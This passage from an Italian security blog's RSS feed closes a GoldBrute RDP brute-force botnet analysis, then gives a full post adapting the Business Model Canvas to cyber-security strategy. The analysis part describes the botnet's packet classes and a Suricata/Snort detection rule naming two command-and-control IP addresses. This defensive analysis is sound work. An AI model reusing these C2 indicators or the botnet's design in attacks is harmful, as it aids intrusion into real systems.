&lt;p&gt;I pacchetti di comunicazione tra i bot e il botmaster sono definiti come classi: BruteProjectPacket, BruteInfoPackage e BruteResultsPackage; vengono utilizzati per ottenere statistiche sulle scansioni, per ricevere aggiornamenti circa lo stato della scansione e per ottenere i risultati finali.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/goldbrute/GOLDBRUTE_IMG11.png&#34; alt=&#34;IMG10&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Risulta interessante notare come, nella nuova versione del malware, siano presenti alcune parti di codice non ancora completamente operative:
- il supporto a protocolli differenti dall’RDP per quanto riguarda il brute force (SSH e Telnet)
- l’utilizzo di un database SQL persistente in sostituzione delle liste volatili utilizzate per tenere memoria dello stato dell’esecuzione
- diversi entry point per permettere l’esecuzione di differenti parti del codice, indipendentemente dall’esecuzione del malware stesso&lt;/p&gt;

&lt;p&gt;Per individuare le comunicazioni tra i bot e il botmaster, abbiamo creato una nuova regola Suricata/SNORT:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;alert tcp any any -&amp;gt; [104.156.249.231,172.94.15.22] 8333 (msg:&amp;quot;CYBERGON CNC GoldBrute Reported CnC connection&amp;quot;; classtype:trojan-activity; sid:8000001; rev:1; metadata: affected_product Windows, attack_target Any, tag GoldBrute, tag RDP Bruteforce, signature_severity Critical, created_at 2019_12_11, updated_at 2019_12_11;)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Il nostro obiettivo è di approfondire il comportamento conseguente all’attività preliminare del malware, per individuare eventuali attività post-infezione.&lt;/p&gt;

&lt;p&gt;Potete consultare la collection delle nostre rules &lt;a href=&#34;https://gitlab.com/cybergon/timon-rules&#34; title=&#34;Cybergon rules&#34;&gt;qui&lt;/a&gt;&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Business Model Canvas: dark edition</title>
         <link>https://blog.cybergon.com/posts/businessmodelcanvas/</link>
         <pubDate>Mon, 02 Dec 2019 14:46:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Lucchina</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/businessmodelcanvas/</guid>
         <description>

&lt;h2 id=&#34;business-model-canvas-cos-è-e-perchè-è-uno-strumento-chiave-per-la-security&#34;&gt;Business Model Canvas: cos&amp;rsquo;è e perchè è uno strumento chiave per la security?&lt;/h2&gt;

&lt;p&gt;Intanto andiamo con ordine e partiamo dal vocabolario e, ovviamente, dalla storia.
Il Business Model Canvas, inventato da A. Osterwalder e diffuso agli appassionati di tutto il mondo con il libro Business Model Generations (&lt;em&gt;Osterwalder, Alexander; Pigneur, Yves; Clark, Tim (2010) Business Model Generation: A Handbook For Visionaries, Game Changers, and Challengers&lt;/em&gt;) ha il grande pregio di riuscire a creare un&amp;rsquo;immagine della strategia - del modo in cui si conducono gli affari - di una azienda. Vi riesce in quanto strumento eccezionale per creare legami, connessioni, tra gli asset principali dell’azienda e i bisogni dei propri clienti. È però anche uno strumento estremamente flessibile, tanto che lo abbiamo velocemente adattato alle strategie di Cyber Security.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/businessmodelcanvas/bmc-black1.PNG&#34; alt=&#34;BMC1&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Nel modello originale si mettono i costi nella parte di sinistra e i ricavi in quella di destra con l’unico punto di contatto che è il “valore” generato dai costi e per il quale i clienti sono disposti a spendere generando i ricavi.&lt;/p&gt;

&lt;h2 id=&#34;business-model-canvas-la-versione-dark&#34;&gt;Business Model Canvas: la versione dark&lt;/h2&gt;

&lt;p&gt;La versione “dark”, invece, pone nella parte di destra i motivi per un attacco e in quella sinistra, quelli per una difesa. Al centro rimane il valore, quello generato dall’azienda ed interessante per “gli operatori del mercato oscuro della Cyber Security”. I ricavi diventano perdite, ossia guadagni per il mondo oscuro. Gartner stima che l’ammontare teorico di queste perdite, per il mercato globale, arrivino alla stratosferica cifra di millecinquecento miliardi di euro. Suddivisi in:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/businessmodelcanvas/bmc-2.png&#34; alt=&#34;BMC2&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Lo spaccato degli introiti per tipologia è stato calcolato in uno dei più dettagliati studi mai fatti sul tema, quello di Mike McGuire (&lt;em&gt;&amp;ldquo;Into the Web of Profit&amp;rdquo; Report&lt;/em&gt;):&lt;/p&gt;

&lt;p&gt;Il valore del mercato del Cyber-Crime diventa per ovvie ragioni il fulcro del nostro ragionamento.&lt;/p&gt;

&lt;p&gt;La crescita vertiginosa dei ricavi e del numero di persone occupate deve far riflettere chiunque sia connesso e sfrutti servizi della rete. Diverse agenzie di intelligence stanno diffondendo analisi e dati sul tema. Basti pensare che si stima ci siano circa 3,5 milioni di programmatori che lavorano per queste organizzazioni. Ma non solo vi lavorano, sembra anche che lo facciano in cambio di compensi molto interessanti, soprattutto se parametrizzati all’area geografica di provenienza.&lt;/p&gt;

&lt;p&gt;Ad esempio, ci permette di capire come mai Apple abbia messo una taglia da un milione di dollari per chiunque segnali una zero-day-vulnarability relativa ai suoi sistemi. La cifra non è simbolica, bensì pesata: una vulnerabilità di quel tipo per iOS o MacOS è acquistabile sul dark-web per una cifra che va dai 400 mila ai 700 mila dollari. Secondo una legge economica non scritta, è presumibile che si debba pagare un premio del 30% sul prezzo visto il rischio che queste persone avrebbero uscendo allo scoperto.&lt;/p&gt;

&lt;h3 id=&#34;business-model-canvas-come-strumento-per-capire-quanto-ci-costa-una-breccia&#34;&gt;Business Model Canvas come strumento per capire quanto ci costa una breccia&lt;/h3&gt;

&lt;p&gt;Quindi, stabilito che il principale motivo per cui veniamo attaccati è per avere un vantaggio economico, cosa potrebbe esserci di meglio del &lt;em&gt;Business Model Canvas&lt;/em&gt; per individuare il rapporto tra costi e ricavi con i secondi in accezione di mancate uscite/perdite. Per farlo abbiamo rivisto i blocchi su un piano strategico differente ma mantenendo la logica iniziale. Come detto, la vera differenza sta nei ricavi, in quanto l’obiettivo di questa versione è limitare le perdite.&lt;/p&gt;

&lt;p&gt;Segmenti di clientela diventa &lt;strong&gt;Opponents&lt;/strong&gt;: i soggetti interessati ai «Critical Assets». Come nella versione tradizionale il collegamento con il valore è fondamentale: bisogna sapere chi potrebbe essere interessato ad ottenerlo. Si tratta di profili potenziali, dalla fantapolitica del Cyberterrorista in caso di utility energetiche o industrie chimiche al più probabile ex-collaboratore scontento ed intenzionato a vendere qualche informazione riservata. Nel mare delle ipotesi solo chi conosce i propri asset è in grado di fare simulazioni realistiche.&lt;/p&gt;

&lt;p&gt;Proposte di valore diventa &lt;strong&gt;Value for the opponent&lt;/strong&gt;: il centro di tutto, il valore. Cambia l’azione: dal doverlo proporre al doverlo difendere, ma non cambia la centralità del blocco per il modello. Gli investimenti generano competitività quindi valore, tutto quello che un’azienda fa è per accrescerlo, che sia la capitalizzazione o il prezzo di vendita, tutto si consolida in questo blocco. Nel modello «dark» la questione un po’ si complica. Il valore per l’opponente può essere qualcosa di specifico da proteggere oppure una serie di cose generiche che comunque attraggono, come il semplice fatto di essere sul mercato o connesso alla rete. In ogni modo il valore da difendere (es: i dati sanitari dei pazienti) è spesso e volentieri ciò che si è creato con gli investimenti (costi).&lt;/p&gt;

&lt;p&gt;Canali diventa &lt;strong&gt;Vulnerabilities&lt;/strong&gt;: i sistemi sono vulnerabili, il codice è sempre imperfetto, attraverso queste imperfezioni sulle macchine possono eseguire comandi non previsti dalla nostra organizzazione. Le vulnerabilità sono uno dei due canali tramiti i quali gli opponenti accedono al valore. Le vulnerabilità sono di per sé valore, vedremo poi il perché.&lt;/p&gt;

&lt;p&gt;Relazione con i clienti diventa &lt;strong&gt;People Vulnerabilities&lt;/strong&gt;: eccoci al fattore umano, sempre presente e imperfetto nella sua complessità. Sulle usanze, l’educazione tra le persone e la diseducazione verso gli strumenti digitali gli opponenti riescono ad avere accesso ad informazioni sensibili, superandolo molti se non tutti i sistemi di difesa.&lt;/p&gt;

&lt;p&gt;Flussi di ricavi diventa &lt;strong&gt;Losses&lt;/strong&gt;: equivalgono ai guadagni dato che quello che spendo per la difesa è un investimento per evitare perdite successive, esattamente come quando si investe per creare valore che diventerà un’entrata.&lt;/p&gt;

&lt;p&gt;Risorse Chiave diventa &lt;strong&gt;Critical Assets&lt;/strong&gt;: possono essere segreti industriali, informazioni riservate o qualunque dato oggetto di “compliance” verso leggi, regolamenti e contratti. Non vanno interpretati solo come informazioni da proteggere ma anche come la disponibilità dei sistemi che ne permettono lo sfruttamento legale. Dal punto di vista della strategia di difesa nulla cambia: l’informazione deve essere difesa sia contro il furto sia contro l’indisponibilità.&lt;/p&gt;

&lt;p&gt;Attività Chiave diventa &lt;strong&gt;Security Operations&lt;/strong&gt;: l’unico modo per «gestire» le vulnerabilità sono delle procedure che le tracciano, le identificano e ove non sia possibile risolverle, le isolano. Parliamo di un lavoro molto vasto, che non è fattibile da persone di buona volontà, servono processi automatizzati, procedure e piani di contingenza.&lt;/p&gt;

&lt;p&gt;Partner Chiave diventa &lt;strong&gt;Training and Culture&lt;/strong&gt;: le persone sono il vero “tallone di Achille” di una strategia di difesa, non importa il livello di sofisticazione, loro rimangono vulnerabili. Nonostante questo, non bisogna arrendersi. Investire in formazione e informazione continua, per creare cultura, è l’unica via. Andrebbe inquadrato come un percorso di studi per una corretta vita digitale. Porsi le domande giuste, applicare prudenza e buon senso, esattamente come si fa quando siamo turisti in una città sconosciuta.&lt;/p&gt;

&lt;p&gt;Struttura dei corsi diventa &lt;strong&gt;Defence Costs&lt;/strong&gt;: tutto quello che riguarda l’acquisizione di tecnologie, competenze e approntamento. Siano essi costi interni o esterni.&lt;/p&gt;

&lt;h3 id=&#34;business-model-canvas-qualche-considerazione-fondamentale&#34;&gt;Business Model Canvas: qualche considerazione fondamentale&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Prima considerazione importante&lt;/strong&gt;: se vedete un’autostrada di connessioni logiche che attraversa tutto il Canvas allora potete considerarvi un target specifico. In questo caso è opportuno fare delle analisi che esulano lo spazio della Cyber Security e includono economia, politica, legislazione, ecc. In tutti gli altri casi, invece, potete comunque considerarvi un bersaglio generico; per la verità la differenza è minima: tutti sono target generici e solo alcuni lo sono specifici. Per questo consigliamo di adottare una strategia di Average Security (contattaci per sapere di cosa si tratta o attendi la prossima pubblicazione). Un piccolo spoiler: secondo questa teoria diventiamo interessanti per un opponente in funzione del numero di vulnerabilità che esponiamo!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Seconda considerazione importante&lt;/strong&gt;: i canali. Lo abbiamo semplificato, ovviamente, ma i canali di attacco sono raggruppabili in due macro-aree: le vulnerabilità dei sistemi e quelle delle persone. Le prime possono essere tenute sotto controllo con procedure (&lt;em&gt;Operations&lt;/em&gt;) che riguardano il monitoraggio, la correlazione, l’aggiornamento e il ripristino dei sistemi. Le seconde, invece, sono molto più complesse e sono inversamente proporzionali alla complessità applicata (&lt;em&gt;“The real effect of security policies”&lt;/em&gt;). Solo con formazione e informazione continua, si può ambire a creare un livello culturale adeguato. Non è un caso se questi due blocchi “specchino” la loro controparte nella parte sinistra del Canvas. Investire su di loro crea valore, nell’accezione del modello in cui valore è impedire il drenaggio di risorse vitali: immateriali o finanziarie che siano.&lt;/p&gt;
</description>
       </item>
       
     </channel>
   </rss>
